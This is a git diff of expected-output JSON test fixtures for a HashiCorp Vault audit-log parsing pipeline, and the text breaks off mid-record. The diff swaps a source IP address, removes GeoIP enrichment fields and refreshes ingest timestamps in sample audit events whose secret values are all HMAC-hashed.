{"time":"2021-06-29T17:26:11.402530449Z","type":"request","auth":{"client_token":"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef","accessor":"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e","display_name":"token-375f9cb3-4355-42c7-eab5-029f8a310ca7-runner","policies":["app-continuous-delivery","app-github-runner","default"],"token_policies":["app-continuous-delivery","app-github-runner","default"],"metadata":{"AllocationID":"375f9cb3-4355-42c7-eab5-029f8a310ca7","Namespace":"","NodeID":"b70676cb-731b-976b-edc4-a5b1bb963fe4","Task":"runner"},"token_type":"service","token_ttl":259200,"token_issue_time":"2021-04-29T21:53:46Z"},"request":{"id":"0042ad1b-1400-7eb7-5e25-1dfc898c1998","operation":"read","mount_type":"kv","client_token":"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef","client_token_accessor":"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e","namespace":{"id":"root"},"path":"secret/data/apps/continuous-delivery/aws-bucket-sse-c","remote_address":"10.6.8.36"}} diff --git a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json index 15f28f4a8ab..f8156983e31 100644 --- a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json +++ b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json @@ -21,7 +21,7 @@ }, "id": "cd09708b-11cc-2985-648b-cfe262cf7e50", "mount_type": "system", - "remote_address": "156.33.241.5", + "remote_address": "67.43.156.13", "client_token_accessor": "hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931", "operation": "update" }, @@ -51,33 +51,15 @@ }, "related": { "ip": [ - "156.33.241.5" + "67.43.156.13" ] }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-DC", - "city_name": "Washington", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "District of Columbia", - "location": { - "lon": -76.9882, - "lat": 38.9034 - } - }, - "as": { - "number": 3495, - "organization": { - "name": "US Senate" - } - }, - "ip": "156.33.241.5" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-07-22T19:55:04.277138800Z", - "original": "{\"time\":\"2020-12-01T20:29:04.356625452Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"display_name\":\"oidc-12349999999999999999\",\"policies\":[\"default\",\"group-admin\"],\"token_policies\":[\"default\",\"group-admin\"],\"metadata\":{\"account_id\":\"12349999999999999999\",\"email\":\"example@gmail.com\",\"role\":\"gmail\"},\"entity_id\":\"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046\",\"token_type\":\"service\",\"token_ttl\":3600,\"token_issue_time\":\"2020-12-01T20:28:40Z\"},\"request\":{\"id\":\"cd09708b-11cc-2985-648b-cfe262cf7e50\",\"operation\":\"update\",\"mount_type\":\"system\",\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"client_token_accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"namespace\":{\"id\":\"root\"},\"path\":\"sys/capabilities-self\",\"data\":{\"paths\":[\"hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27\"]},\"remote_address\":\"156.33.241.5\"}}", + "ingested": "2021-12-09T13:39:31.089175500Z", + "original": "{\"time\":\"2020-12-01T20:29:04.356625452Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"display_name\":\"oidc-12349999999999999999\",\"policies\":[\"default\",\"group-admin\"],\"token_policies\":[\"default\",\"group-admin\"],\"metadata\":{\"account_id\":\"12349999999999999999\",\"email\":\"example@gmail.com\",\"role\":\"gmail\"},\"entity_id\":\"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046\",\"token_type\":\"service\",\"token_ttl\":3600,\"token_issue_time\":\"2020-12-01T20:28:40Z\"},\"request\":{\"id\":\"cd09708b-11cc-2985-648b-cfe262cf7e50\",\"operation\":\"update\",\"mount_type\":\"system\",\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"client_token_accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"namespace\":{\"id\":\"root\"},\"path\":\"sys/capabilities-self\",\"data\":{\"paths\":[\"hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27\"]},\"remote_address\":\"67.43.156.13\"}}", "kind": "event", "action": "update", "id": "cd09708b-11cc-2985-648b-cfe262cf7e50", @@ -117,7 +99,7 @@ }, "id": "cd09708b-11cc-2985-648b-cfe262cf7e50", "mount_type": "system", - "remote_address": "156.33.241.5", + "remote_address": "67.43.156.13", "client_token_accessor": "hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931", "operation": "update" }, @@ -167,33 +149,15 @@ }, "related": { "ip": [ - "156.33.241.5" + "67.43.156.13" ] }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-DC", - "city_name": "Washington", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "District of Columbia", - "location": { - "lon": -76.9882, - "lat": 38.9034 - } - }, - "as": { - "number": 3495, - "organization": { - "name": "US Senate" - } - }, - "ip": "156.33.241.5" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-07-22T19:55:04.277142479Z", - "original": "{\"time\":\"2020-12-01T20:29:04.36089379Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"display_name\":\"oidc-12349999999999999999\",\"policies\":[\"default\",\"group-admin\"],\"token_policies\":[\"default\",\"group-admin\"],\"metadata\":{\"account_id\":\"12349999999999999999\",\"email\":\"example@gmail.com\",\"role\":\"gmail\"},\"entity_id\":\"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046\",\"token_type\":\"service\",\"token_ttl\":3600,\"token_issue_time\":\"2020-12-01T20:28:40Z\"},\"request\":{\"id\":\"cd09708b-11cc-2985-648b-cfe262cf7e50\",\"operation\":\"update\",\"mount_type\":\"system\",\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"client_token_accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"namespace\":{\"id\":\"root\"},\"path\":\"sys/capabilities-self\",\"data\":{\"paths\":[\"hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27\"]},\"remote_address\":\"156.33.241.5\"},\"response\":{\"mount_type\":\"system\",\"data\":{\"capabilities\":[\"hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367\",\"hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a\",\"hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176\",\"hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2\",\"hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb\"],\"secret/metadata/apps/github-runner/ca-cert\":[\"hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367\",\"hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a\",\"hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176\",\"hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2\",\"hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb\"]}}}", + "ingested": "2021-12-09T13:39:31.089185200Z", + "original": "{\"time\":\"2020-12-01T20:29:04.36089379Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"display_name\":\"oidc-12349999999999999999\",\"policies\":[\"default\",\"group-admin\"],\"token_policies\":[\"default\",\"group-admin\"],\"metadata\":{\"account_id\":\"12349999999999999999\",\"email\":\"example@gmail.com\",\"role\":\"gmail\"},\"entity_id\":\"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046\",\"token_type\":\"service\",\"token_ttl\":3600,\"token_issue_time\":\"2020-12-01T20:28:40Z\"},\"request\":{\"id\":\"cd09708b-11cc-2985-648b-cfe262cf7e50\",\"operation\":\"update\",\"mount_type\":\"system\",\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"client_token_accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"namespace\":{\"id\":\"root\"},\"path\":\"sys/capabilities-self\",\"data\":{\"paths\":[\"hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27\"]},\"remote_address\":\"67.43.156.13\"},\"response\":{\"mount_type\":\"system\",\"data\":{\"capabilities\":[\"hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367\",\"hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a\",\"hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176\",\"hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2\",\"hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb\"],\"secret/metadata/apps/github-runner/ca-cert\":[\"hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367\",\"hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a\",\"hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176\",\"hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2\",\"hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb\"]}}}", "kind": "event", "action": "update", "id": "cd09708b-11cc-2985-648b-cfe262cf7e50", @@ -252,7 +216,7 @@ "ip": "10.6.8.34" }, "event": { - "ingested": "2021-07-22T19:55:04.277144209Z", + "ingested": "2021-12-09T13:39:31.089189500Z", "original": "{\"time\":\"2021-07-19T17:19:00.673898225Z\",\"type\":\"request\",\"auth\":{\"token_type\":\"default\"},\"request\":{\"id\":\"24ac580b-805a-d9ee-4d0d-7046932f4e05\",\"operation\":\"update\",\"mount_type\":\"pki\",\"client_token\":\"hmac-sha256:db417023d954a03aea8f56a3daf35460aa51920337420c7c22bcbb6b10852f23\",\"namespace\":{\"id\":\"root\"},\"path\":\"internal-ca/issue/internal-server\",\"data\":{\"alt_names\":\"hmac-sha256:9760c514cdbf3ec61fa8d375643f29a78640528ddbbef6a49053ef9de6251eee\",\"common_name\":\"hmac-sha256:bc800a949f7b2fe6401884da3a085de232365d7b508d741198fa2d88815f6d7c\",\"ip_sans\":\"hmac-sha256:b6d902ee3c49cae1cfa8c9172f649716f802a4186c686b813bd344077fe0b5b2\"},\"remote_address\":\"10.6.8.34\"},\"error\":\"permission denied\"}", "kind": "event", "action": "update", @@ -317,7 +281,7 @@ "ip": "10.6.8.34" }, "event": { - "ingested": "2021-07-22T19:55:04.277145878Z", + "ingested": "2021-12-09T13:39:31.089194600Z", "original": "{\"time\":\"2021-07-19T17:19:00.674663552Z\",\"type\":\"response\",\"auth\":{\"token_type\":\"default\"},\"request\":{\"id\":\"24ac580b-805a-d9ee-4d0d-7046932f4e05\",\"operation\":\"update\",\"mount_type\":\"pki\",\"client_token\":\"hmac-sha256:db417023d954a03aea8f56a3daf35460aa51920337420c7c22bcbb6b10852f23\",\"namespace\":{\"id\":\"root\"},\"path\":\"internal-ca/issue/internal-server\",\"data\":{\"alt_names\":\"hmac-sha256:9760c514cdbf3ec61fa8d375643f29a78640528ddbbef6a49053ef9de6251eee\",\"common_name\":\"hmac-sha256:bc800a949f7b2fe6401884da3a085de232365d7b508d741198fa2d88815f6d7c\",\"ip_sans\":\"hmac-sha256:b6d902ee3c49cae1cfa8c9172f649716f802a4186c686b813bd344077fe0b5b2\"},\"remote_address\":\"10.6.8.34\"},\"response\":{\"mount_type\":\"pki\",\"data\":{\"error\":\"hmac-sha256:409ef1533baffc8e15cd4424780c9aba5d10f168b8d641f111da43e7955451fa\"}},\"error\":\"1 error occurred:\\n\\t* permission denied\\n\\n\"}", "kind": "event", "action": "update", @@ -392,7 +356,7 @@ "ip": "10.6.8.36" }, "event": { - "ingested": "2021-07-22T19:55:04.277147572Z", + "ingested": "2021-12-09T13:39:31.089198700Z", "original": "{\"time\":\"2021-06-29T17:26:11.402530449Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef\",\"accessor\":\"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e\",\"display_name\":\"token-375f9cb3-4355-42c7-eab5-029f8a310ca7-runner\",\"policies\":[\"app-continuous-delivery\",\"app-github-runner\",\"default\"],\"token_policies\":[\"app-continuous-delivery\",\"app-github-runner\",\"default\"],\"metadata\":{\"AllocationID\":\"375f9cb3-4355-42c7-eab5-029f8a310ca7\",\"Namespace\":\"\",\"NodeID\":\"b70676cb-731b-976b-edc4-a5b1bb963fe4\",\"Task\":\"runner\"},\"token_type\":\"service\",\"token_ttl\":259200,\"token_issue_time\":\"2021-04-29T21:53:46Z\"},\"request\":{\"id\":\"0042ad1b-1400-7eb7-5e25-1dfc898c1998\",\"operation\":\"read\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef\",\"client_token_accessor\":\"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e\",\"namespace\":{\"id\":\"root\"},\"path\":\"secret/data/apps/continuous-delivery/aws-bucket-sse-c\",\"remote_address\":\"10.6.8.36\"}}", "kind": "event", "action": "read", @@ -490,7 +454,7 @@ "ip": "10.6.8.36" }, "event": { - "ingested": "2021-07-22T19:55:04.277163317Z", + "ingested": "2021-12-09T13:39:31.089204100Z", "original": "{\"time\":\"2021-06-29T17:26:11.409840527Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef\",\"accessor\":\"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e\",\"display_name\":\"token-375f9cb3-4355-42c7-eab5-029f8a310ca7-runner\",\"policies\":[\"app-continuous-delivery\",\"app-github-runner\",\"default\"],\"token_policies\":[\"app-continuous-delivery\",\"app-github-runner\",\"default\"],\"metadata\":{\"AllocationID\":\"375f9cb3-4355-42c7-eab5-029f8a310ca7\",\"Namespace\":\"\",\"NodeID\":\"b70676cb-731b-976b-edc4-a5b1bb963fe4\",\"Task\":\"runner\"},\"token_type\":\"service\",\"token_ttl\":259200,\"token_issue_time\":\"2021-04-29T21:53:46Z\"},\"request\":{\"id\":\"0042ad1b-1400-7eb7-5e25-1dfc898c1998\",\"operation\":\"read\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef\",\"client_token_accessor\":\"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e\",\"namespace\":{\"id\":\"root\"},\"path\":\"secret/data/apps/continuous-delivery/aws-bucket-sse-c\",\"remote_address\":\"10.6.8.36\"},\"response\":{\"mount_type\":\"kv\",\"data\":{\"data\":{\"customer_key\":\"hmac-sha256:85d3c6e705ea04f49772b92cc7335e34c53f0264a6d75bba3ab95bad22ca5bd1\"},\"metadata\":{\"created_time\":\"hmac-sha256:9c910646d7399704ee015b4247b374bfb950282339d902a221b1ff4c83b13ee7\",\"deletion_time\":\"hmac-sha256:17a84bc5c1c7ee851af0069663ab9de3c879107724470fa34fc0b5418fb653db\",\"destroyed\":false,\"version\":1}}}}", "kind": "event", "action": "read", @@ -572,7 +536,7 @@ "ip": "10.6.8.34" }, "event": { - "ingested": "2021-07-22T19:55:04.277164880Z", + "ingested": "2021-12-09T13:39:31.089259300Z", "original": "{\"time\":\"2021-06-29T18:01:29.545476939Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:f69c28fde8609df2a0ec6a316c0293179fa922a8a3a660a314859e6cff8e5fef\",\"accessor\":\"hmac-sha256:2ee197e25b333d83ba45d0c40aca153e0ad6c9e42b04b6de6a5b5b575de58771\",\"display_name\":\"token-c1d6c089-2f46-ff11-5988-38636bddf8d9-homeassistant\",\"policies\":[\"app-home-assistant\",\"default\"],\"token_policies\":[\"app-home-assistant\",\"default\"],\"metadata\":{\"AllocationID\":\"c1d6c089-2f46-ff11-5988-38636bddf8d9\",\"Namespace\":\"\",\"NodeID\":\"a28cef3a-f9e6-ad7d-bc5f-2c5ac27eec51\",\"Task\":\"homeassistant\"},\"token_type\":\"service\",\"token_ttl\":259200,\"token_issue_time\":\"2021-06-24T21:22:03Z\"},\"request\":{\"id\":\"3aa3f349-b55a-53e3-a795-dd4137d64299\",\"operation\":\"read\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:f69c28fde8609df2a0ec6a316c0293179fa922a8a3a660a314859e6cff8e5fef\",\"client_token_accessor\":\"hmac-sha256:2ee197e25b333d83ba45d0c40aca153e0ad6c9e42b04b6de6a5b5b575de58771\",\"namespace\":{\"id\":\"root\"},\"path\":\"secret/data/apps/home-assistant/secrets_yaml\",\"remote_address\":\"10.6.8.34\"}}", "kind": "event", "action": "read", @@ -698,7 +662,7 @@ "ip": "10.6.8.34" }, "event": { - "ingested": "2021-07-22T19:55:04.277166410Z", + "ingested": "2021-12-09T13:39:31.089265900Z", "original": "{\"time\":\"2021-06-29T18:01:29.547355273Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:f69c28fde8609df2a0ec6a316c0293179fa922a8a3a660a314859e6cff8e5fef\",\"accessor\":\"hmac-sha256:2ee197e25b333d83ba45d0c40aca153e0ad6c9e42b04b6de6a5b5b575de58771\",\"display_name\":\"token-c1d6c089-2f46-ff11-5988-38636bddf8d9-homeassistant\",\"policies\":[\"app-home-assistant\",\"default\"],\"token_policies\":[\"app-home-assistant\",\"default\"],\"metadata\":{\"AllocationID\":\"c1d6c089-2f46-ff11-5988-38636bddf8d9\",\"Namespace\":\"\",\"NodeID\":\"a28cef3a-f9e6-ad7d-bc5f-2c5ac27eec51\",\"Task\":\"homeassistant\"},\"token_type\":\"service\",\"token_ttl\":259200,\"token_issue_time\":\"2021-06-24T21:22:03Z\"},\"request\":{\"id\":\"3aa3f349-b55a-53e3-a795-dd4137d64299\",\"operation\":\"read\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:f69c28fde8609df2a0ec6a316c0293179fa922a8a3a660a314859e6cff8e5fef\",\"client_token_accessor\":\"hmac-sha256:2ee197e25b333d83ba45d0c40aca153e0ad6c9e42b04b6de6a5b5b575de58771\",\"namespace\":{\"id\":\"root\"},\"path\":\"secret/data/apps/home-assistant/secrets_yaml\",\"remote_address\":\"10.6.8.34\"},\"response\":{\"mount_type\":\"kv\",\"data\":{\"data\":{\"aladdin_connect_password\":\"hmac-sha256:f3a85a98373fa879041a438606e38773fdfaca9d99e2a1ee08183a2cb8fc9a17\",\"aladdin_connect_username\":\"hmac-sha256:b3c982a71d17164325f4ef6a9831a132e1bb789833fc6d1ecab5d36bc71df112\",\"elasticsearch_password\":\"hmac-sha256:8d2328e2c80428977858c0a80c6624c7910dd7da0b74c8d33e4d8d22fc0e9ad1\",\"elasticsearch_url\":\"hmac-sha256:c63aa2b5d15069aa9ff53eb1b6f4418a21a87c4fe508655d7f396b4bdf73492c\",\"elasticsearch_username\":\"hmac-sha256:bb7bdfaa02957aaf85efd2ea4585e05aa1ccb4594eb6820078bf8df46d123133\",\"rest_notify_cisco_phone_csrc_token\":\"hmac-sha256:b2120f2e905e41167ea380586d9f1bb13772873bb3e35aba28daca747921faad\",\"rest_notify_cisco_phone_password\":\"hmac-sha256:a4c3451df78d28825309c3b25fefb6fdb9314350da1169b012923325929d2b5d\",\"rest_notify_cisco_phone_username\":\"hmac-sha256:1229909bcdaa7acf6894ebfa51daff701b9f026f7bfff5525fe7ddfcf8469af6\",\"smtp_host\":\"hmac-sha256:bf4e6e6f4b1af3beb385006278b7e2da94eb4b243af8738727ba5e82375138c5\",\"smtp_password\":\"hmac-sha256:7b8a462d76578b0e4ddf162d9a244eb5a736d3d04b21d9ed399ad7f44032743e\",\"smtp_port\":587,\"smtp_username\":\"hmac-sha256:d97eb233a52d67e2fb16b43950b8537659b69a13e03aa58a771d8e82379354e4\",\"twilio_account_sid\":\"hmac-sha256:509150eeaf7657a069a37df450fe5821b307a882a2634230edf0b8b172f2fca8\",\"twilio_auth_token\":\"hmac-sha256:09cf3ffa023a5b5750d0aaff696f767b5a00c1af430b297abdc84d53dd4d139e\",\"cam_backyard_rtsp_url\":\"hmac-sha256:bcac97c20cdc641ca7ba4d1e4c80246961f6f116670ce6ae32be1a01be36fed1\",\"cam_backyard_url\":\"hmac-sha256:5a9348e779c7260e4375a734a4947506e97f86098e45db8d63ba800698d26c34\",\"cam_basement_door_rtsp_url\":\"hmac-sha256:ffd1f989ed0632e542f760ae8e683852e6d4b22acb24b5eae94e1568e977b007\",\"cam_basement_door_url\":\"hmac-sha256:550f62496448494a4a30a4c8499903ea58ea7ab43102a56103020c122795861b\",\"cam_driveway_rtsp_url\":\"hmac-sha256:7b732f13b417be1d8387dc9c517087cd2f9a854898f8bd50922ae39c9123cf5f\",\"cam_driveway_url\":\"hmac-sha256:aef04b9fc7c345e7cb49f3833fbe0d56c8d8c6c6d922152250019f83bfc38acc\",\"cam_front_door_rtsp_url\":\"hmac-sha256:db5ef5a052e6d09fee199dede89f5178afd5f642843268aa5bb43e755785f916\",\"cam_front_door_url\":\"hmac-sha256:6b5129afbd2e43f8ac8fe25a0b7c27f69c19d8713a95ac98ebfa65c8e51fd089\",\"cam_garage_rtsp_url\":\"hmac-sha256:10aa878ec26fdfa5e3a486ead013c693425f5c6bd3315b9365132a0c963c30f6\",\"cam_garage_url\":\"hmac-sha256:80d5c5b1080b12ed3681806bcc560f2ff0f53a43549df72396b14f41d1871dbf\",\"cam_mechanical_room_rtsp_url\":\"hmac-sha256:e343a772988cbc3262c6256df08c0c9f1a0f50e3bcefe3f39febc7cb135e2132\",\"cam_mechanical_room_url\":\"hmac-sha256:fd1f4d286bebd86234c474580cc2a74fdb79b16d936e4b8562e5cc13d82fbf7b\",\"cam_os_password\":\"hmac-sha256:b428f7bdeb97348f2553143030dfb1ac3b714436b59ed74e3320af2e13b5919f\",\"cam_os_username\":\"hmac-sha256:ff23e0d8782523b6a57c1bc1d21f88ef451359d7acefb032864e7a2715ba4185\",\"yale_lock_code_andrew\":\"hmac-sha256:545bca27b7805c8f17433693e8a07dab5c8b9d07a9a0e99ba04d73917c882956\",\"yale_lock_code_neva\":\"hmac-sha256:954080fe6c36dddfecea03fe20c91fa75d1c54488c1c706c988650dd0c45647e\",\"zwave_network_key\":\"hmac-sha256:382cc81146b9b71dc62135d6fb97246c74818857f3a73b03e7f7367ea53a8336\"},\"metadata\":{\"created_time\":\"hmac-sha256:be77f81a3338087479da238bf04ab23998c11375bc830cdeca8e30c24ab8a095\",\"deletion_time\":\"hmac-sha256:17a84bc5c1c7ee851af0069663ab9de3c879107724470fa34fc0b5418fb653db\",\"destroyed\":false,\"version\":6}}}}", "kind": "event", "action": "read", diff --git a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-faked-all-fields.log-expected.json b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-faked-all-fields.log-expected.json index eed7c1c11ea..266b1cdf818 100644 --- a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-faked-all-fields.log-expected.json +++ b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-faked-all-fields.log-expected.json @@ -48,7 +48,7 @@ "ip": "172.17.0.1" }, "event": { - "ingested": "2021-07-22T19:55:04.737199034Z", + "ingested": "2021-12-09T13:39:31.476462Z", "original": "{\"time\":\"2018-04-09T21:04:29.6406536Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"display_name\":\"token\",\"policies\":[\"default\",\"sudo\",\"surf-admin\"],\"metadata\":{\"loglevel\":\"raw\",\"remote\":\"false\",\"surf\":\"moderate\"},\"entity_id\":\"\"},\"request\":{\"id\":\"b2f72168-6cba-1bab-808a-72d9304b82f8\",\"operation\":\"read\",\"client_token\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"client_token_accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"path\":\"auth/token/lookup-self\",\"data\":null,\"policy_override\":false,\"remote_address\":\"172.17.0.1\",\"wrap_ttl\":0,\"headers\":{}},\"error\":\"\"}", "kind": "event", "action": "read", @@ -143,7 +143,7 @@ "ip": "172.17.0.1" }, "event": { - "ingested": "2021-07-22T19:55:04.737203036Z", + "ingested": "2021-12-09T13:39:31.476471Z", "original": "{\"time\":\"2018-04-09T21:04:29.6420203Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"display_name\":\"token\",\"policies\":[\"default\",\"sudo\",\"surf-admin\"],\"metadata\":{\"loglevel\":\"raw\",\"remote\":\"false\",\"surf\":\"moderate\"},\"entity_id\":\"\"},\"request\":{\"id\":\"b2f72168-6cba-1bab-808a-72d9304b82f8\",\"operation\":\"read\",\"client_token\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"client_token_accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"path\":\"auth/token/lookup-self\",\"data\":null,\"policy_override\":false,\"remote_address\":\"172.17.0.1\",\"wrap_ttl\":0,\"headers\":{}},\"response\":{\"data\":{\"accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"creation_time\":1523307682,\"creation_ttl\":180000000,\"display_name\":\"hmac-sha256:e38035c165f0076d9288ba0363eb36733379cc5d370bec5e82f11632519c26a8\",\"entity_id\":\"hmac-sha256:2fced7e2c77266f5079d733bea71dc8c8413d3838584ca9d0f4867271df7a220\",\"expire_time\":\"2023-12-23T05:01:22.8929692Z\",\"explicit_max_ttl\":0,\"id\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"issue_time\":\"2018-04-09T21:01:22.8929624Z\",\"meta\":{\"loglevel\":\"hmac-sha256:eac4a7deb2df94609ab14ae48b9edea81d91de51be1dd59df6ca6852537227c5\",\"remote\":\"hmac-sha256:aa2d1dd64d4468bbd9c6b0ca275cdffb7473a2d91b5f42a047161620245fcc79\",\"surf\":\"hmac-sha256:8b29af9294da23c72de8d8d847ccebd450d978af5565807d0c9922b6b2e92988\"},\"num_uses\":0,\"orphan\":false,\"path\":\"hmac-sha256:36ea987a227a2c7aefe055a98f99751383f601955e9f1925bd3c2d6f9931a025\",\"policies\":[\"hmac-sha256:451623ebbe12fb9b1b3f444ceb5a5a46102452e46d640925c7b0dcb93a65a99a\",\"hmac-sha256:9a76c609b073848f2d9cb4a7fcddfc2103c0063480b87a9ee585e9e072e901d9\",\"hmac-sha256:8924f876eca967c68bbc8ac138e9f876f2144